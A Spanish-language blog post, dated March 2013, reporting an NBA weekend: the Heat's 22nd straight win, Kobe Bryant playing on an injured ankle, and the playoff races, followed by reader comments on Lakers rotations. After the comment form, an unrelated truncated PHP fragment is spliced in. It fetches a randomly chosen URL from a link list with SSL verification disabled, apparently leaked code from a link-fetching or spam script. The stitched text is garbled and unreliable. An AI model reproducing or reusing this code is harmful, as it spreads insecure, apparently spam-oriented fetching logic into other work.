Informe del fin de semana: 22!

18 de March de 2013 por MagicJohnson32

Los Heat se han convertido este fin de semana en el tercer equipo de la historia capaz de ganar 22 partidos de manera consecutiva en una misma regular season. Con una más, superarán la marca de los Rockets, y ya sólo quedarán por delante aquellos Lakers de la 71-72, liderados por Jerry West y Wilt Chamberlain, que lograron el récord histórico con 33 victorias seguidas. Pero han pasado más cosas. Por ejemplo, los puestos de Playoffs del Este, quitando de la primera plaza, están mucho más abiertos de lo que parecía, mientras que en el Oeste los Warriors toman aire y complican un poco la vida a los Rockets. Se presenta apasionante el final de regular season.

Veamos detalladamente qué ha sucedido desde el viernes.

VIERNES

“Blackjack”. Pocas fueron las crónicas que se resistieron a titular así después de la 21ª victoria consecutiva de los Heat, el 107-94 sobre los Bucks. Ilyasova hizo todo lo posible para mantener vivos a los Bucks, pero Monta Ellis tuvo uno de sus peores días y tampoco estuvo Jennings demasiado inspirado. Los campeones apenas necesitaron contribuciones más allá de las del Big Three, con LeBron, Wade y Bosh sumando lo que todos los Bobcats en un partido cualquiera: 76 puntos, 24 rebotes y 16 asistencias.

kobe lesionEn cambio, lo que vimos en Indiana se salió de la rutina. Con un tobillo machacado, apenas 40 horas después de lesionarse en Atlanta, Kobe Bryant fue titular ante los Pacers. Sólo aguantó los primeros 12 minutos y no anotó, y habrá quien diga que fue absurdo, arriesgado e irresponsable, pero en una temporada angustiosa y repleta de lesiones, sirvió una vez más de ejemplo e inspiración para su equipo, que obtuvo una de esas victorias (99-93) que son mucho más que una victoria. Howard, Nash y World Peace cumplieron pero el verdadero factor diferencial lo pusieron Jamison y especialmente Steve Blake, autor de 18 puntos (5/7 triples), 6 rebotes, 7 asistencias, 4 robos y 2 tapones, con un +21 durante los 35 minutos que estuvo en cancha. Los Pacers sufrieron para anotar consistentemente, especialmente cerca del aro, y sólo George Hill tuvo éxito con 11/19 tiros.

La victoria de los Lakers no sirvió para recortar distancias con los Rockets, que ganaron a los Wolves (100-108), pero sí con los Warriors, apalizados por los Bulls en su pista (113-95). En Houston, los locales tuvieron que remontar 20 puntos a los Wolves, que se disolvieron como un azucarillo en la segunda parte, cuando encajaron un 43-69. Harden lideró la remontada con 37-7-8 y dejó a su equipo a tiro de los Warriors, que no pudieron con Noah & Co. La pareja Curry & Thompson tuvo un día aciago (15 puntos con 5/22 tiros de campo) y los Bulls arrasaron en los dos cuartos intermedios para llegar al final del tercero con 31 puntos de ventaja.

La brecha entre quinto y sexto del Oeste ya es insalvable, más aún después de la undécima victoria seguida de los Nuggets (la 15ª seguida en su pista). Denver prolongó su racha a costa de la de los Grizzlies, que en su visita a Colorado impusieron su ritmo de juego pero acabaron viéndose superados (80-87) por el mejor equipo local de la liga. Koufos, con 18 puntos, 16 rebotes y 3 tapones, fue quien mayor provecho sacó al ritmo plomizo de los Grizzlies.

No se acaban de descolgar los Mavs, que ganaron a los Cavaliers (86-96) con sólo 36 puntos de sus titulares. Ante tal panorama, se hizo necesaria una de las rarísimas apariciones de Beaubois, que juega bien con la frecuencia de paso del cometa Halley. Ante los Cavs hubo avistamiento: 18 puntos, 5 asistencias y 3 rebotes del de Guadalupe, y junto a Wright y Collison fueron esenciales para la victoria texana. Lo de sudar las victorias no va con los Thunder, que endosaron 73 puntos en la primera mitad ante los Magic, y en la reanudación se dedicaron a administrar la renta (104-117). Suficiente tuvieron los Magic con mantener la compostura gracias al ya habitual 21-14 de Vucevic y un gran papel de todo el quinteto.

A la cola del Oeste cayeron Suns y Hornets, derrotados en sus visitas a Atlanta y Washington. Josh Smith dominó a un equipo que partió con Jermaine O’Neal de inicio, con Scola prácticamente desterrado, y que tuvo en Goran Dragic a su mejor jugador. La victoria de los Hawks (94-107) les mantiene igualados con los Bulls por la quinta posición. Por su parte, John Wall y Grevis Vásquez protagonizaron un bonito enfrentamiento que se saldó con triunfo de los Wizards (87-96), liderados por su base (29 puntos, 12/15 tiros, 9 asistencias).

Del Bobcats-Raptors sólo se puede destacar los 21 rebotes capturados por Amir Johnson y los 28 puntos con grandes porcentajes de Rudy Gay, principales causas de la victoria canadiense (78-92). Gerald Henderson sigue firmando buenas actuaciones para Charlotte y McRoberts parece consolidarse como el PF titular.

TOP 10 del viernes

SÁBADO

Los seis partidos del sábado se decantaron del lado local. De especial trascendencia fue la victoria de los Jazz ante los Grizzlies (84-90), que mantiene intactas las posibilidades de los de Salt Lake City de alcanzar los Playoffs. Al fin se decidió Corbin a devolver la titularidad a Hayward, y el SF recompensó a su técnico liderando la victoria ante un equipo probablemente cansado en su cuarto partido en cinco días. Los Grizzlies, tan peleones como siempre, no se rindieron pero sólo anotaron dos canastas en todo el tercer cuarto y cierran así el fin de semana con dos derrotas. Otro tanto le ha sucedido al espejo de los Grizzlies en la Conferencia Este, los Indiana Pacers, que perdieron por segunda noche consecutiva y no han sabido aprovechar las derrotas de los Knicks durante la ausencia de Melo para destacarse en la segunda posición. El sábado, los Pacers cedieron ante los Sixers, que estuvieron liderados por Holiday y un descomunal Hawes (18 puntos, 16 rebotes, 8 asistencias y 7 tapones).

TD CavsVictoria muy necesaria la que obtuvieron los Blazers sobre Detroit Pistons (101-112), con claro dominio del frontcourt formado por Batum, Hickson y Aldridge, autor éste último de 31 puntos y 12 rebotes. Stuckey y Will Bynum anotaron 55 puntos, insuficientes para evitar la décima derrota de Detroit en los últimos once partidos. Todos ellos palidecen ante el gran Tim Duncan, que tras su fenomenal actuación del jueves ante los Mavs, volvió a hacerlo para dar la victoria a los Spurs contra los Cavaliers (113-119). 30 puntos (13/19 tiros), 12 rebotes, 4 asistencias y 5 tapones logró esta leyenda viva del baloncesto, que en esta ocasión contó con una de las mejores versiones de Kawhi Leonard esta temporada.

Los 34 puntos de Webster (mejor marca anotadora de su carrera) y otro excelente partido de John Wall fueron lo más destacado del triunfo de los Wizards sobre los Suns (105-127). Atención a los números recientes de esta pareja: Webster suma 24 de 47 triples en los últimos 5 encuentros, mientras que Wall promedia 24 puntos y 11 asistencias en los últimos 4 y ha anotado 20 de sus últimos 26 tiros de campo.

Por último, la ausencia de Garnett no supuso problema alguno ante los Bobcats para unos Celtics que vengaron así la reciente derrota encajada en Charlotte. Lee y Pierce sumaron esfuerzos con dos actuaciones muy completas (11 rebotes, 12 asistencias, 6 tapones entre ambos) y prácticamente todos los jugadores verdes contribuyeron a la cómoda victoria (88-105).

TOP 10 del sábado

DOMINGO

lebron rapsHubo un momento, a eso de las 20h00 de ayer domingo, en el que parecía que los Raptors estaban en condiciones de disputarle el partido a los Heat y acabar con la racha de victorias de los campeones. Los Raptors habían remado desde un -16 hasta empatar a 77 a once minutos para la conclusión. Más que un momento, fue un espejismo: los Heat sacaron entonces el mazo, Ray Allen metió 16 puntos casi seguidos y los Raptors encajaron un 28-4 para acabar el partido (105-81). Gay, Valanciunas y Amir Johnson estuvieron notables pero Kyle Lowry se quedó a 0 y así poco importó el abrumador dominio canadiense en el rebote (51-26). Los Heat visitan esta próxima madrugada a los Celtics, uno de los pocos conjuntos con credenciales para frenar a este equipo.

Tampoco tuvo desperdicio lo que, simultáneamente, vimos en Milwaukee. Los Magic se lucieron durante tres cuartos. Vucevic dominaba las pinturas, Harkless las metía desde cualquier sitio y Afflalo explotaba su superioridad física sobre Monta Ellis llevándoselo al poste bajo. Al final del tercer cuarto, el marcador reflejaba un +11 para los visitantes. Y entonces apareció el mejor Monta Ellis para liderar una remontada demoledora, con un parcial de 28-45 en el último cuarto que incluyó 25 puntos suyos, con 8/10 en tiros de campo (5/5 triples). El 109-115 final no hace justicia a la magnífica imagen ofrecida por los Magic durante muchos minutos. No tuvo suerte Tobias Harris en su regreso a Milwaukee, castigado con problemas de faltas durante toda la velada y eliminado justo antes de que los Bucks completasen la remontada.

A continuación, los Clippers despacharon sin mucho brillo a los Knicks (80-93), que sin Melo, Stoudemire y Chandler encajaron su cuarta derrota seguida y ven en serio peligro el liderato de la Atlantic a poco que Nets y Celtics aprieten. En el Staples fueron siempre a remolque de los Clippers, que no necesitaron gran cosa para anotarse un triunfo que les da un partido de ventaja sobre Grizzlies y Nuggets por la tercera posición del Oeste. Las recientes derrotas de Knicks y Pacers dejan un panorama interesante en los puestos del 2º al 7º del Este, con sólo 3,5 partidos de diferencia entre uno y otro. En un duelo directo dentro de esta lucha, los Hawks se impusieron a los Nets en Brooklyn (105-93) gracias un último cuarto dominante, 34-20. Al Horford mantuvo su excelente nivel, Josh Smith hizo su habitual estadística all-around y Jeff Teague supuso la chispa que necesitaba el banquillo de los Hawks. Los 14 puntos y 22 rebotes de Reggie Evans se van al cajón de los grandes esfuerzos en vano del fin de semana.

Los Rockets perdieron anoche la oportunidad de dar caza a los Warriors. Más que eso, fueron atropellados por los de Oakland en su propia cancha (108-78) con Steph Curry y Klay Thompson de artilleros ante un equipo que sólo anotó 9 de los 35 triples que intentó. Los Warriors salen del fin de semana con 1,5 partidos de ventaja sobre Houston y 2 sobre los Lakers, que resolvieron su compromiso ante los Kings sin excesivas complicaciones (102-113). No estuvo Kobe Bryant, enfermo y con el tobillo dolorido, y tampoco jugó Cousins, con lo cual el partido fue propicio para algunos habitualmente secundarios. Destacó entre todos ellos Antawn Jamison, que partió como suplente peró jugó 35 minutos en los que anotó 27 puntos y atrapó 9 rebotes. Como ya ocurriera en Indiana,  Blake también jugó un excelente partido (16-5-8). Nash, Howard y World Peace firmaron números más o menos previsibles, mientras que Isaiah Thomas y Patterson fueron los mejores visitantes.

thundersLos que no aguantan el ritmo son los Mavs, que se ven cuatro partidos por debajo de la octava plaza tras caer ante los Thunder (107-101) en un precioso encuentro que no se resolvió hasta el último minuto. Después de que Nowitzki empatase a 101 con cuatro tiros libres consecutivos, los Thunder acabaron con un 6-0 para asegurar la victoria que les vuelve a situar a un partido de los Spurs por el liderato del Oeste. Brillaron Westbrook (35-6-6), Ibaka (18-16-3) y Durant, autor de siete canastas consecutivas en el último cuarto. Como de costumbre, Nowitzki y Carter fueron los mejores por los Mavs.

Otro final emocionante se vivió en Minnesota, donde un 2+1 de Ricky Rubio y dos tapones de Kirilenko a Eric Gordon y Mason dieron la victoria a los Wolves sobre los Hornets (95-97). Regresaron AK y Pekovic, aunque el más destacado fue Derrick Williams, con 28 puntos. El trío Vásquez-Lopez-Davis sumó 61 puntos y 27 rebotes, pero los Hornets encajaron un 0-6 en el último minuto y se mantienen en la cola del Oeste.

TOP 10 del domingo

Comenta

6 comentarios a esta entrada

  1. Denise dice:
    #1

    ¿Ebanks está lesionado? ó ¿cual es el origen de la disputa con D’Anthoni? . En un partido en casa contra los Kings, D’Anthoni debería darle un poco de bola a Sacre, Ebanks, Morris o Duhon y estirar más la rotación. Tampoco creo que porque jueguen 5-10 minutos cada uno, ya por ello el partido se les vaya a ir de las manos.

      Citar

  2. MagicJohnson32 dice:
    #2

    No, Ebanks no está lesionado, ni Morris, ni Duhon, ni Sacre. D’Antoni siempre usa rotaciones cortas, 7-8 jugadores. A principio de temporada rota más pero en cuanto tiene claro a quién quiere y a quién no, prefiere recortar y que los que juegan tengan muchos minutos.

    De hecho, más le vale a Meeks espabilar o se va a quedar fuera y Blake va a jugar sus minutos de 2 suplente. Enorme nivel de Steve Blake, cómo ha mejorado el equipo con su vuelta.

      Citar

  3. Denise dice:
    #3

    MagicJohnson32: No, Ebanks no está lesionado, ni Morris, ni Duhon, ni Sacre. D’Antoni siempre usa rotaciones cortas, 7-8 jugadores. A principio de temporada rota más pero en cuanto tiene claro a quién quiere y a quién no, prefiere recortar y que los que juegan tengan muchos minutos

    Ya ..y que los casi 40 añeros como Nash o Jamison lleguen a mayo con bombonas de oxigeno..

      Citar

  4. Denise dice:
    #4

    MagicJohnson32: <De hecho, más le vale a Meeks espabilar o se va a quedar fuera y Blake va a jugar sus minutos de 2 suplente. Enorme nivel de Steve Blake, cómo ha mejorado el equipo con su vuelta.

    Bueno…Meeks yo creo que el hombre es que no da más de si. Demasiada buena temporada está haciendo cumpliendo con su rol de jugar 15-20 minutos y anotar sus triples desde la esquina. En ese rol ha cumplido con creces, ahora, si le pides salir de titular y que se busque sus propios tiros, ahí creo que ya se pierde .

      Citar

  5. MagicJohnson32 dice:
    #5

    No, lo digo porque está fallando esos tiros completamente solo, y si no mete eso entonces no sirve. No se le pide más que eso, pero si no lo hace… En cambio, Blake y Jamison sí los están metiendo, y de qué manera. Y encima Blake aporta sentido al juego y está asistiendo incluso más que Nash.

      Citar

  6. Denise dice:
    #6

    Mark Cuban después de abuchear a Fisher: “Cuando ayudas a alguien, esperás algo de lealtad a cambio. Ha sido decepcionante”.

    Que importante es que haya un Cuban en la NBA para animar esto…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>